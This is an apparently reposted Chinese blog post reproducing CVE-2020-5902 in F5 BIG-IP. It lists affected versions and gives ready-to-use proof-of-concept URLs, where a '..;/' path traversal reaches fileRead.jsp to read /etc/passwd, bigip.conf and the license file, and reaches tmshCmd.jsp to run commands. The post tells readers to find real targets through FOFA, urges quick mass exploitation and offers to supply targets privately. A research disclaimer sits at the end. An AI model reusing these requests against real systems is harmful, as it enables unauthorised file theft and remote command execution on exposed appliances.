漏洞环境
FOFA搜索BIG-IP找资产,找不到目标站私信我。
漏洞危害
2020年07月03日通报的该漏洞,赶紧刷一波。攻击者通过向该页面发送特制的请求包,可以造成任意Java代码执行。进而控制 F5 BIG-IP 的全部功能,包括任意文件读取和系统命令执行等
影响范围
BIG-IP 15.x: 15.1.0/15.0.0
BIG-IP 14.x: 14.1.0-14.1.2
BIG-IP 13.x: 13.1.0-13.1.3
BIG-IP 12.x: 12.1.0-12.1.5
BIG-IP 11.x: 11.6.1-11.6.5
漏洞复现
https://ip/tmui/login.jsp
任意文件读取漏洞:文末附POC
RCE漏洞:文末附POC
任意文件读取POC:
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
RCE漏洞POC:
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin
原文始发于微信公众号(赛瑞攻防实验室):CVE-2020-5902 BIG-IP 任意文件读取&RCE漏洞复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论